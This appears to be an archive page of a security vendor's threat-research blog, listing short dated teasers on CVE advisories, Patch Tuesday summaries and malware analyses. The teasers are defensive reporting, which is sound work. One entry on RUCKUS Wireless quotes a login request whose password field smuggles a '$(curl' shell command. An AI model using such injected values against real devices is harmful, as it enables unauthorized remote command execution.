Posted: September 11, 2024
Overview Microsoft’s September 2024 Patch Tuesday has 79 vulnerabilities, of which 30 are Elevation of Privilege. SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of September 2024 […]
Posted: September 6, 2024
Overview The SonicWall Capture Labs threat research team became aware of the threat CVE-2024-23119, assessed its impact and developed mitigation measures for this vulnerability. CVE-2024-23119 is a high-severity SQL Injection vulnerability in Centreon, impacting Centreon […]
Posted: August 28, 2024
Overview The SonicWall Capture Labs threat research team became aware of an unauthenticated directory traversal vulnerability affecting FastAdmin installations. Identified as CVE-2024-7928 and with a moderate score of 5.3 CVSSv3, the vulnerability is more severe […]
Posted: August 27, 2024
Summary This week, the SonicWall Capture Labs threat research team observed an AutoIT-compiled executable that attempts to open Gmail login pages via MS Edge, Google Chrome and Mozilla Firefox. It has functionality to read clipboard […]
Posted: August 21, 2024
Overview The SonicWall Capture Labs threat research team became aware of an account takeover vulnerability in Cisco’s Smart Software Manager (SSM), assessed its impact and developed mitigation measures for the vulnerability. Identified as CVE-2024-20419 and […]
Posted: August 14, 2024
Overview Microsoft’s 2024 Patch Tuesday has 87 vulnerabilities, 36 of which are Elevation of Privilege vulnerabilities. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of 2024 […]
Posted: August 6, 2024
Overview The SonicWall Capture Labs threat research team became aware of an arbitrary file upload vulnerability in Progress WhatsUp Gold, assessed its impact and developed mitigation measures. WhatsUp Gold is a software that monitors every […]
Posted: August 5, 2024
Overview A fake website seemingly distributing WinRar, a data compression, encryption, and archiving tool for Windows, has been seen also hosting malware. This fake website closely resembles the official website, uses typosquatting, and capitalizes on […]
Posted: July 31, 2024
Overview The SonicWall Capture Labs threat research team became aware of the threat CVE-2024-28747, a vulnerability in SmartPLC devices, assessed its impact and developed mitigation measures for this vulnerability. This vulnerability of hardcoded credentials affects […]
Posted: July 29, 2024
Overview The SonicWall Capture Labs threat research team became aware of a remote code execution vulnerability in GeoServer, assessed its impact and developed mitigation measures. GeoServer is a community-driven project that allows users to share […]
Posted: July 17, 2024
Overview The SonicWall Capture Labs threat research team became aware of an arbitrary file read vulnerability affecting Splunk Enterprise installations. Identified as CVE-2024-36991 and given a CVSSv3 score of 7.5, the vulnerability is more severe […]
Posted: July 16, 2024
Overview The SonicWall Capture Labs threats research team has recently been tracking new ransomware known as LukaLocker. This malware has been seen in the wild over the last few weeks and is being distributed by […]
Posted: July 12, 2024
The SonicWall RTDMI ™ engine has recently protected users against the distribution of the “6.6” variant of DarkGate malware by a phishing email campaign containing PDF files as an attachment. DarkGate is an advanced Remote […]
Posted: July 10, 2024
Overview Microsoft’s July 2024 Patch Tuesday has 138 vulnerabilities, 59 of which are Remote Code Execution. The SonicWall Capture Lab’s threat research team has analyzed and addressed Microsoft’s security advisories for the month of July […]
Posted: July 8, 2024
Overview The SonicWall Capture Labs threat research team became aware of an XML External Entity Reference vulnerability affecting Adobe Commerce and Magento Open Source. It is identified as CVE-2024-34102 and given a critical CVSSv3 score […]
Posted: July 3, 2024
The SonicWall Capture Labs threat research team has been observing PDF files with QR codes being abused by malware authors to deceive users for a long time. QR codes are increasingly popular due to their […]
Posted: July 3, 2024
Overview The SonicWall Capture Labs threat research team became aware of a path traversal vulnerability in SolarWinds Serv-U, assessed its impact and developed mitigation measures. Serv-U server is a solution that provides a secure file […]
Posted: June 27, 2024
Overview This week, the SonicWall Capture Labs threat research team investigated a sample of Orcinius malware. This is a multi-stage trojan that is using Dropbox and Google Docs to download second-stage payloads and stay updated. […]
Posted: June 27, 2024
DarkMe RAT steals information from victims’ machines and responds to various commands received from its Command and Control (C&C) server. A spike in distributing DarkMe RAT was observed in February 2024, exploiting the zero-day (CVE-2024-21412) […]
Posted: June 24, 2024
The SonicWall Capture Labs threat research team has been tracking StrelaStealer for a long time. Recently, in the third week of June, we observed a huge spike in JavaScript spreading StrelaStealer. StrelaStealer specifically steals Outlook […]
Posted: June 20, 2024
Overview The SonicWall Capture Labs threat research team became aware of an exploited-in-the-wild information disclosure vulnerability affecting the Windows-based PHP servers used in CGI mode. Identified as CVE-2024-4577 and given a CVSSv3 score of 9.8, […]
Posted: June 11, 2024
Overview Microsoft’s June 2024 Patch Tuesday has 49 vulnerabilities, 24 of which are Elevation of Privilege. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June […]
Posted: June 5, 2024
Overview The SonicWall Capture Labs threat research team became aware of an exploited-in-the-wild information disclosure vulnerability affecting the Check Point Security Gateways. Identified as CVE-2024-24919 and given a CVSSv3 score of 8.6, the vulnerability is […]
Posted: June 4, 2024
Overview This week, the SonicWall Capture Labs Research team analyzed a sample of Linux ransomware. The group behind this ransomware, called INC Ransomware, has been active since it was first reported a year ago. Infection […]
Posted: May 30, 2024
Overview The SonicWall Capture Labs threat research team became aware of a remote code execution vulnerability in the Atlassian Confluence Data Center and Server, assessed its impact and developed mitigation measures. Confluence Server is a […]
Posted: May 23, 2024
Overview The SonicWall Capture Labs threat research team became aware of a noteworthy vulnerability –an SQL injection in the WordPress plugin Automatic by ValvePress – assessed its impact and developed mitigation measures for it. Around […]
Posted: May 21, 2024
The SonicWall Capture Labs threat research team has been observing a growth of malware built using the Chaos ransomware builder. The sample we have analyzed here is built using this kit, however, it is not […]
Posted: May 14, 2024
Overview Microsoft’s May 2024 Patch Tuesday has 59 vulnerabilities, 25 of which are Remote Code Execution vulnerabilities. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of […]
Posted: May 14, 2024
Overview This week, the SonicWall Capture Labs threat research team investigated a sample of the RemcosRAT that uses a PrivateLoader module to provide additional data and persistence on the victim’s machine. By installing VB scripts, […]
Posted: May 13, 2024
Overview The SonicWall Capture Labs threat research team became aware of CVE-2024-31984, which is a code injection vulnerability in XWiki’s management of space titles and has a critical CVSS score of 9.9. After assessing the […]
Posted: May 1, 2024
Overview SonicWall Capture Labs threat research team became aware of a fully unauthenticated server-side template injection vulnerability within CrushFTP, assessed its impact, and developed mitigation measures. CrushFTP is an enterprise file transfer tool. Such tools […]
Posted: April 30, 2024
Overview This week the SonicWall Capture Labs threat research team came across a sample purporting to be Windows Explorer. At a glance, everything checks out – it uses the legitimate Windows Explorer icon and the […]
Posted: April 29, 2024
Overview The SonicWall Capture Labs threat research team has been regularly sharing information about malware targeting Android devices. We’ve encountered similar RAT samples before, but this one includes extra commands and phishing attacks designed to […]
Posted: April 25, 2024
Overview The SonicWall Capture Labs threat research team became aware of a cross-site scripting vulnerability in GitLab, assessed its impact and developed mitigation measures. GitLab, an open-source code-sharing platform, published an advisory on this vulnerability […]
Posted: April 23, 2024
Overview SonicWall Capture Labs threat research team has observed fileless .Net managed code injection in a native 64-bit process. Native code or unmanaged code refers to low-level compiled code such as C/C++. Managed code refers […]
Posted: April 22, 2024
Overview The SonicWall Capture Labs threat research team has recently been tracking ransomware known as HydraCrypt. HydraCrypt originates from the CryptBoss ransomware family and was first seen in early 2016. The sample that we analyzed […]
Posted: April 19, 2024
Overview The SonicWall Capture Labs threat research team became aware of a noteworthy vulnerability—an Unauthenticated Template Injection —in Atlassian Confluence platforms, assessed its impact and developed mitigation measures for it. Atlassian’s Confluence Server and Data […]
Posted: April 9, 2024
Overview Microsoft’s April 2024 Patch Tuesday has 147 vulnerabilities, 68 of which are Remote Code Execution (RCE) vulnerabilities. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for April 2024 […]
Posted: April 5, 2024
Overview The SonicWall Capture Labs threat research team analyzed a malware purporting to be a Java utility. It arrives as an installer for Java Access Bridge, but ultimately installs the popular open-source cryptominer, XMRig. Infection […]
Posted: April 5, 2024
Overview The SonicWall Capture Labs threat research team became aware of a couple of remote code execution vulnerabilities in JumpServer, assessed their impact and developed mitigation measures. JumpServer is an open-source bastion host and a […]
Posted: April 3, 2024
Overview The SonicWall CaptureLabs threat research team have been recently tracking ransomware created using the Chaos ransomware builder. The builder appeared in June 2021 and has been used by many operators to infect victims and […]
Posted: April 2, 2024
Overview SonicWall Capture Labs threat research team has observed an updated variant of StrelaStealer. StrelaStealer is an infostealer malware known for targeting Spanish-speaking users and focuses on stealing email account credentials from Outlook and Thunderbird. […]
Posted: March 27, 2024
Overview The SonicWall Capture Labs threat research team became aware of a noteworthy vulnerability — an Unauthenticated Command Injection — in Progress Kemp Loadmaster, assessed its impact and developed mitigation measures for it. Kemp Technologies’ […]
Posted: March 25, 2024
Overview This week, the Sonicwall Capture Labs threat research team analyzed a new Golang malware sample. It uses multiple geographic checks and publicly available packages to screenshot the system before installing a root certificate to […]
Posted: March 20, 2024
Overview SonicWall Capture Labs threat research team became aware of a deserialization vulnerability with the Artica Proxy appliance, assessed its impact and developed mitigation measures. Artica Proxy is a comprehensive proxy solution performing tasks such […]
Posted: March 18, 2024
Overview This week, the Sonicwall Capture Labs threat research team analyzed a ransomware calling itself Lighter Ransomware. Upon execution, it opens up a window with a countdown timer instructing the victim to reach out immediately […]
Posted: March 18, 2024
Overview SonicWall Capture Labs threat research team has observed a new variant of WhiteSnake Stealer. This stealer poses significant risks to users and organizations as it can steal critical sensitive data from compromised systems, including […]
Posted: March 13, 2024
Overview The SonicWall RTDMI ™ engine has recently detected Windows Shortcut Files (LNKs) inside archives that execute LokiBot malware on the victim’s machine. The malicious LNK file is packed inside an archive along with a […]
Posted: March 12, 2024
Overview Microsoft’s March 2024 Patch Tuesday has 59 vulnerabilities – 26 of which are Elevation of Privilege. SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March […]
Posted: March 12, 2024
Overview The SonicWall Capture Labs threat research team recently observed an interesting variant of StopCrypt ransomware. The ransomware executes its malicious activities by utilizing multi-stage shellcodes before launching a final payload that contains the file […]
Posted: March 8, 2024
Overview The SonicWall Capture Labs threat research team has been tracking ransomware that has gained recent notoriety known as Medusa. Medusa surfaced as a Ransomware-as-a-Service (RaaS) platform in late 2022. The group behind Medusa predominantly […]
Posted: March 8, 2024
Overview The SonicWall Capture Labs Threat research team has regularly monitored hidden adware on Android. These misleading apps show ads and collect user data to make money from advertisements. They trick users into clicking on […]
Posted: March 7, 2024
Overview The SonicWall Capture Labs threat research team became aware of a couple of noteworthy vulnerabilities — an authentication bypass vulnerability and a path traversal vulnerability — in JetBrains TeamCity, assessed their impact and developed […]
Posted: March 4, 2024
Overview This week, the SonicWall Capture Labs threat research team analyzed a sample of Marsilia malware, also known as Mallox. This is a multi-stage sample that, when functional, will have a first stage that enumerates […]
Posted: March 1, 2024
Overview Threat actors are continuously evolving their malware code to protect them against security defenses. SonicWall Capture Labs threat research team has observed that the latest variant of DBatLoader has included an old version of […]
Posted: February 29, 2024
Overview SonicWall Capture Labs Threat Research Team became aware of the MonikerLink Remote Code Execution vulnerability (CVE-2024-21413) in Microsoft Outlook, assessed its impact and developed mitigation measures for the vulnerability. Microsoft Outlook is a globally […]
Posted: February 22, 2024
SonicWall Capture Labs Threat Research Team became aware of the ClamAV VirusEvent command injection vulnerability (CVE-2024-20328), assessed its impact, and developed mitigation measures for the vulnerability. ClamAV is a notable, open-source anti-virus engine, widely recognized […]
Posted: February 16, 2024
Overview This week, the SonicWall Capture Labs threat research team analyzed a ransomware targeting users who speak English and Standard Chinese. Its behavior is typical of ransomware – it encrypts the user’s files and provides […]
Posted: February 13, 2024
Overview Microsoft’s February 2024 Patch Tuesday has 72 vulnerabilities – 30 of which are Remote Code Execution. The vulnerabilities can be classified into the following categories: 30 Remote Code Execution Vulnerabilities 17 Elevation of Privilege […]
Posted: February 9, 2024
The SonicWall Capture Labs threat research team has been tracking ransomware that encrypts files and claims to charge only $100 for file retrieval. It is written in .NET and obfuscated using Ezirizs .NET Reactor. However, […]
Posted: February 8, 2024
Overview Ivanti disclosed a couple more vulnerabilities — server-side request forgery (CVE-2024-21893) and a privilege escalation (CVE-2024-21888) vulnerability. This disclosure comes only a few weeks after confirming an exploit chain impacting Ivanti Connect Secure and […]
Posted: January 31, 2024
Overview The SonicWall Capture Labs threat research team became aware of the Jenkins CLI (command-line-interface) arbitrary file read vulnerability, assessed its impact and developed mitigation measures for the vulnerability. Jenkins is a Java-based automation tool […]
Posted: January 29, 2024
Overview This week, the SonicWall Capture Labs threat research team analyzed a sample tied to the Blackwood APT group. This is a DLL that, when loaded onto a victim’s computer, will escalate privileges and attempt […]
Posted: January 25, 2024
Overview The SonicWall Capture Labs threat research team became aware of the Ivanti Connect Secure and Policy Secure Gateway authentication bypass vulnerability, assessed its impact and developed mitigation measures for the vulnerability. Ivanti Connect Secure, […]
Posted: January 18, 2024
Overview The SonicWall Capture Labs threat research team became aware of an account takeover via password reset vulnerability in GitLab, assessed its impact and developed mitigation measures for the vulnerability. GitLab, an open-source code-sharing platform, […]
Posted: January 18, 2024
Overview The SonicWall Capture Labs threat research team has recently observed a new variant of Diavol ransomware. The ransomware executes its malicious activities by utilizing bitmap objects containing binary code and paired JPEG objects containing […]
Posted: January 13, 2024
This week, the Sonicwall Capture Labs threat research team analyzed a full-featured infostealer and remote access trojan that also has ransomware functionality built in. This trojan is capable of terminating applications, logging keystrokes, opening web […]
Posted: January 9, 2024
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of January 2024.
Posted: January 5, 2024
Overview The SonicWall Capture Labs threat research team has observed attackers targeting Simple Mail Transfer Protocol (SMTP) to send spoofed emails that can bypass traditional authentication mechanisms. A flaw tracked as three separate CVEs, CVE_2023_51764, […]
Posted: January 5, 2024
The Sonicwall Capture Labs threat research team has been tracking a new ransomware family known as Uransomware. This ransomware appears to be in early development. The sample we analyzed does not ask for payment for […]
Posted: January 2, 2024
Overview This week, the SonicWall Capture Labs threat research team analyzed a new sample of an infostealer dubbed ‘Heracles’, which has multiple evasion and persistence techniques. The malware is programmed to search for system credentials, […]
Posted: December 28, 2023
Overview SonicWall Capture Labs threat research team became aware of a command injection threat within OpenSSH versions before 9.6, assessed its impact, and developed mitigation measures for the vulnerability. OpenSSH is a widely used connectivity […]
Posted: December 27, 2023
Overview For the last three years, GuLoader has gained popularity among threat actors, due to its sophisticated, robust, and powerful defense techniques against security software. The SonicWall Capture Labs Threat Research team has observed that […]
Posted: December 21, 2023
Overview The SonicWall Capture Labs threat research team became aware of an unauthorized arbitrary file upload vulnerability in Apache Struts, assessed its impact and developed mitigation measures for the vulnerability. Apache Struts, an open-source MVC […]
Posted: December 20, 2023
Overview The SonicWall Capture Labs threat research team has been actively tracking malware campaigns deploying a formidable Android Remote Access Trojan (RAT). We encountered a variant of that malware equipped with extensive features such as […]
Posted: December 20, 2023
Overview The SonicWall Capture Labs threat research team has observed and detected a VBScript file which delivers XWorm3.1 to the victim’s machine. The trend of malware authors hiding behind a genuine tool is continuing, and […]
Posted: December 19, 2023
Overview The SonicWall Capture Labs threat research team has observed PDF files masquerading as Ring Central, which is a communication and collaboration platform. This is achieved by incorporating malicious URLs with the intention of executing […]
Posted: December 15, 2023
Overview This week, the Sonicwall Capture Labs threat research team analyzed a fake copy of AnyDesk. AnyDesk is a legitimate remote desktop application commonly used by tech support agents to troubleshoot computer problems remotely and […]
Posted: December 15, 2023
The Sonicwall Capture Labs threat research team has recently been tracking a new variant of Thanos ransomware. It is named after the Marvel supervillian and according to the FBI, is created by Moises Luis Zagala […]
Posted: December 15, 2023
Overview This week the SonicWall Capture Labs threat research team investigated a sample of malware that has multiple infostealer, monitoring and C2 capabilities. The name of the file is translated as ‘Easy Language Program’ from […]
Posted: December 13, 2023
The SonicWall Capture Labs Threat Research team has observed Remcos RAT (Remote Access Trojan) being distributed by adding malicious code in existing open-source software. This appears to be an attempt to evade Security products which […]
Posted: December 12, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of December 2023.
Posted: December 7, 2023
Overview SonicWall Capture Labs Threat Research Team became aware of the threat CVE-2023-34048 (a vCenter Server out-of-bounds write vulnerability), assessed its impact, and developed mitigation measures for the vulnerability. VMware vCenter Server is a centralized […]
Posted: December 7, 2023
Overview The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting Splunk Enterprise. Splunk Enterprise does not safely sanitize extensible stylesheet language transformations (XSLT) that users supply. This means that […]
Posted: November 30, 2023
Overview This week, the SonicWall Capture Labs Threat Research Team became aware of a disclosure of sensitive information vulnerability in ownCloud’s GraphAPI application, assessed its impact and developed mitigation measures for the vulnerability. ownCloud, an […]
Posted: November 27, 2023
OVERVIEW Recently, the SonicWall Capture Labs Threat Research team has identified a new .NET Packer that is currently being widely used by the various stealers such as Lokibot, AgentTesla etc. In the ever-evolving landscape of […]
Posted: November 21, 2023
Overview SonicWall Capture Labs Threat Research Team became aware of the SysAid path traversal vulnerability, assessed its impact and developed mitigation measures for the vulnerability. On November 8, 2023, SysAid, an IT service management company, […]
Posted: November 18, 2023
Overview This week, the Sonicwall Capture Labs Research team has observed an increase in shortcut-based (LNK) malware. These seemingly legitimate LNK files execute PowerShell commands to download malware from a remote server. Infection Cycle The […]
Posted: November 15, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2023.
Posted: November 9, 2023
The SonicWall Capture Labs Threat Research team has observed AgentTesla infostealer being deployed using image(.jpg) files for last few months. We have observed multiple ZIP files with titles in European languages. Different IPs were seen […]
Posted: November 9, 2023
Overview The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting Apache ActiveMQ allowing a remote attacker with network access to a broker to run arbitrary shell commands by manipulating […]
Posted: November 3, 2023
The Sonicwall threat research team have recently been tracking a new ransomware family called Payola. This family of ransomware appeared in late August 2023. It is written in .NET and is easy to analyze as […]
Posted: November 3, 2023
Sunhillo SureLine versions before 8.7.0.1.1 contain an unauthenticated OS command injection vulnerability through the ipAddr or dnsAddr parameters within the networkDiag.cgi script.
Posted: October 26, 2023
Overview SonicWall Capture Labs Threat Research Team became aware of the threat Citrix Bleed, assessed its impact and developed mitigation measures for the vulnerability. Citrix NetScaler is an Application Delivery Controller (ADC) and load balancer […]
Posted: October 20, 2023
Overview The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting on-premises instances of Confluence Server and Confluence Data Center allowing unauthorized users to get administrative-level privileges by creating unauthorized […]
Posted: October 16, 2023
This week, the SonicWall Capture Labs Research Team looked at a sample of Mystic Stealer. This is an infostealer that first appeared earlier in 2023. It has a variety of defensive techniques to evade detection […]
Posted: October 13, 2023
SonicWall Capture Labs Threat Research Team became aware of the threat, assessed its impact, and developed mitigation measures for the curl SOCKS5 heap buffer overflow vulnerability released this week. Overview Client URL, or curl, and […]
Posted: October 10, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of October 2023.
Posted: October 6, 2023
Overview SonicWall Capture Labs Threat Research Team became aware of the threat, assessed its impact, and developed mitigation measures for JetBrains TeamCity Server. JetBrains TeamCity, a robust continuous integration (CI) and continuous deployment (CD) server, […]
Posted: September 28, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: phpPgAdmin is an open-source, web-based administration tool for managing PostgreSQL, an advanced, enterprise-class, and open-source relational database system. phpPgAdmin is written in PHP […]
Posted: September 22, 2023
Improper error message handling in Zyxel ZyWALL/USG,VPN,USG FLEX and ATP firmware series could allow an unauthenticated attacker to execute some OS commands remotely by sending crafted packets to an affected device.
Posted: September 22, 2023
This week, the Sonicwall Capture Labs Research team analyzed the latest Snatch ransomware. Snatch operates as a ransomware-as-a-service (RaaS), a business model where the malware authors lease out the ransomware program to affiliates who then […]
Posted: September 12, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2023.
Posted: September 8, 2023
The SonicWall Capture Labs threats research team has been tracking a recent family of ransomware called RZML. This ransomware appeared in the wild over the last 7 days and appears to be a variant of […]
Posted: September 8, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: KSMBD is an integral server component within the Linux kernel. Its primary function is to implement the SMBv3 protocol, which is essential for […]
Posted: September 1, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Rockwell Automation’s ThinManager is designed for managing thin clients, mobile devices, cameras, and industrial devices. Comprising both client and server components, the client […]
Posted: August 25, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Redis stands as an in-memory, high-performance key-value data store that is both lightweight and non-volatile. Designed to offer quick access to simple yet […]
Posted: August 25, 2023
This week, the SonicWall Capture Labs Threat Research Team has observed the following threat: The Amadey botnet malware has been packaged with a Redline infostealer to infiltrate systems, extract a variety information, and enable control […]
Posted: August 18, 2023
RUCKUS Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.
Posted: August 11, 2023
Bring Your Own Vulnerable Driver (BYOVD)
Posted: August 8, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of August 2023.
Posted: August 4, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: The Netgear ProSAFE Network Management System (NMS300) is a centralized and comprehensive management application designed for network administrators. It enables them to discover, […]
Posted: August 1, 2023
The SonicWall Capture Labs Research team has received a sample of a new variant from Chaos Ransomware family which is a customizable ransomware builder that emerged in underground forums, by falsely marketing itself as the […]
Posted: July 27, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: XWiki is recognized as a second-generation wiki platform, bringing together the conventional wiki functionality and the unique potential of an application development platform. […]
Posted: July 21, 2023
TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 contains a command injection vulnerability in the web management interface. By injecting malicious commands, the attacker could execute them as the root user, potentially gaining unauthorized access and control over the router.
Posted: July 11, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of July 2023.
Posted: July 7, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: OpenEMR is a comprehensive open-source electronic health records (EHR) and medical practice management application. It provides an array of functionalities aimed at enhancing […]
Posted: July 5, 2023
SonicWall Capture Labs Research team recently observed an Agent Tesla malware that is being loaded by using Native Loader. Agent Tesla is an advanced Remote Access Trojan (RAT) developed using Microsoft .Net framework capable of stealing sensitive information. It has become one of the most prevalent malware families from the past couple of years.
Posted: June 30, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: OpenSSL stands as a renowned open-source library, primarily utilized for SSL and TLS. The Secure Socket Layer (SSL) and the Transport Layer Security […]
Posted: June 26, 2023
SonicWall Capture Labs Research team has discovered an ongoing instance of cryptocurrency fraud that utilizes legitimate Google services, specifically Google Script macros. Threat actors intentionally target these platforms because they are both convenient to use […]
Posted: June 23, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: The Barracuda Email Security Gateway is a comprehensive email security solution developed to safeguard businesses from a multitude of email threats such as […]
Posted: June 21, 2023
SonicWall Capture Labs Threat research team recently discovered a campaign requesting users to provide their card details on a fraudulent bank application under the pretense of claiming rewards points. Additionally, they persuade users to enable […]
Posted: June 15, 2023
SonicWall Capture Labs Research team recently observed a new variant of Amadey malware. Amadey is a botnet with main objective of stealing sensitive information and to inject additional payload by receiving the commands from command & control server. In this variant we observed that it has modified its string decoding algorithm.
Posted: June 13, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of June 2023.
Posted: June 9, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: MOVEit provides secure collaboration and automated file transfers of sensitive data and advanced workflow automation capabilities without the need for scripting. Encryption and […]
Posted: June 9, 2023
With the popularity of ChatGPT, an artificial intelligence (AI) chatbot, cybercriminals has been using it to lure unsuspecting victims to online scams. Recently, the Sonicwall Capture Labs Research team has come across a scam promising […]
Posted: June 2, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: The vulnerability labeled as CVE-2023-2951 is a critical issue found in the “Code-Projects” Bus Dispatch and Information System version 1.0, specifically involving a […]
Posted: May 31, 2023
In this blog post, we will discuss
Unpacking of GuLoader’s shellcodes.
Understanding a new anti-debug technique deployed by GuLoader.
Deep dive into GuLoader’s custom Vectored Exception Eandler.
Writing an IDAPython script to deobfuscate the control flow of shellcode and to make GuLoader’s analysis easy and fast.
Posted: May 26, 2023
Vulnerability in the DCBI-Netlog-LAB v1.0 allows attackers to bypass authentication and execute arbitrary commands via a crafted request.
Posted: May 26, 2023
Recently, SonicWall Capture Labs Threat research team discovered a Dot Net stealer malware with enormous capabilities including stealing information from Browsers, VPNs, Steam profiles, installed Apps, Cryptocurrency wallets, Cryptocurrency wallets browsers extensions and sensitive device […]
Posted: May 19, 2023
LB-Link is a well-known company in the networking industry that specializes in the design, manufacturing, and distribution of wireless networking products. The company’s product portfolio includes a wide range of wireless routers, network adapters, Wi-Fi […]
Posted: May 19, 2023
The SonicWall Capture Labs threats research team has been tracking a newly discovered form of ransomware called “Akira”. This malicious software is actively targeting numerous organizations and stealing sensitive data. To maximize the likelihood of […]
Posted: May 19, 2023
The SonicWall Capture Labs threats research team has been tracking a newly discovered form of ransomware called “Akira”. This malicious software is actively targeting numerous organizations and stealing sensitive data. To maximize the likelihood of […]
Posted: May 9, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2023.
Posted: May 9, 2023
SonicWall Capture Labs Research team analyzed a Raspberry Robin, which is known for its endless anti-evasion’s techniques and multiple layers of packing. The layers have several anti-debugger, anti-sandbox, anti-VM and anti-emulator checks. Malware has kept evolving and intensified the hide-and-seek game over time and has improved this game with a variety of original evasions and tactics.
Posted: May 9, 2023
SonicWall Capture Labs Threat research team recently discovered a malware campaign that utilizes a Remote Access Trojan (RAT) with enormous capabilities, including keylogging, stealing sensitive device information, bypassing Google Authenticator, etc. These features allow the […]
Posted: May 5, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Adobe ColdFusion is a powerful web development platform that enables developers to create dynamic, data-driven websites and applications with ease. ColdFusion Markup Language […]
Posted: May 5, 2023
Overview: This week, SonicWall Capture Labs Threat Research Team analyzed a Linux backdoor sample, labelled as ‘Gafgyt’, that targets multiple platforms and acts as an enumeration tool, downloader, and C2 agent. This sample is a […]
Posted: April 28, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: vBulletin is written in PHP and uses MySQL as its database management system. It is designed to provide a robust platform for online […]
Posted: April 24, 2023
Delivering Malicious PDF documents as email attachments is the easiest way for threat actors to get into the victim’s machine be it phishing, or embedded scripts for delivering malware payloads. This time SonicWall Capture Labs […]
Posted: April 21, 2023
An externally controlled reference to a resource vulnerability exists in QNAP NAS running Photo Station. If exploited, this could allow an attacker to modify system files.
Posted: April 18, 2023
Recently, the SonicWall Capture Labs Research team analyzed a ransomware called Money message. Written in C++, this ransomware encrypts the victim’s files without changing the filename or appending the extension, making it more difficult to […]
Posted: April 17, 2023
SonicWall Capture Labs threat research team has come across new C++ based variant of Laplas Clipper which targets the cryptocurrency users. Laplas clipper have been observed in the past with .NET and GO language variants. In this variant, the malware employs various anti debug, anti sandbox and anti analysis techniques to evade its detection.
Posted: April 12, 2023
Malware comes as the Zip bundle as legitimate software Advanced Port Scanner which contains multiple components related to software including malicious Dll.
Posted: April 11, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of April 2023.
Posted: April 7, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: GitLab is a web-based platform for software development and collaboration, offering a comprehensive suite of tools for version control, continuous integration, and continuous […]
Posted: March 31, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Public Key Infrastructure (PKI) is a comprehensive framework for managing digital certificates and cryptographic keys, serving as the foundation for secure communication over […]
Posted: March 31, 2023
The 3CX application is delivered on the victim’s machine along with compromised DLLs “ffmpeg.dll” and “d3dcompiler_47.dll”
Posted: March 28, 2023
AsyncRAT latest variant has advances its capabilities by including additional commands support from C2, clipper module, cryptostealer module, keylogger module and ability to prevent system from going to sleep.
Posted: March 24, 2023
TerraMaster NAS devices running TOS version 4.2.29 suffer from a vulnerability which allows remote unauthenticated attackers to execute commands as root
Posted: March 23, 2023
The SonicWall Capture Labs threat research team has once again observed a surge in Emotet. This the notorious malware, which heavily targets large organizations, uses similar tactics and functionality observed in past variants. Originally a […]
Posted: March 22, 2023
The Snake keylogger final payload is wrapped by multiple layers of protection, to prevent its detection and analysis
Posted: March 15, 2023
What is CVE-2023-23397 CVE-2023-23397 is a Microsoft Outlook Elevation of Privilege Vulnerability. This allows for a NTLM Relay attack against another service to authenticate as the user. SonicWall provides protection against exploits targeting this vulnerability. […]
Posted: March 14, 2023
SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of March 2023.
Posted: March 14, 2023
The SonicWall RTDMI is detecting a surge of VBScript files for last few weeks which downloads and executes GuLoader shellcode on the victim’s machine
Posted: March 10, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: phpIPAM is a free and open-source web-based IP address management (IPAM) software application. It is designed to help organizations efficiently manage their IP […]
Posted: March 8, 2023
The SonicWall Capture Labs Threat Research team came across a malware campaign that steals device information, card information, and google authenticator code on Android devices. This malware uses famous Android app icons to mislead users and trick victims into installing the malicious app on their device
Posted: March 7, 2023
SonicWall RTDMI detected OneNote malicious file is not detected by any security providers available on popular threat intelligence sharing portals like the VirusTotal and the ReversingLabs
Posted: March 3, 2023
This week, the Sonicwall Capture Labs Research team analyzed a Trojan downloader targeting Linux environments. This Trojan has been around since 2019, but has not been active in the past year until recently. It uses […]
Posted: March 3, 2023
Overview: SonicWall Capture Labs Threat Research Team has observed the following threat: Froxlor is a web-based server management panel that allows users to easily manage multiple web hosting accounts on a single server. It is […]
Posted: February 24, 2023
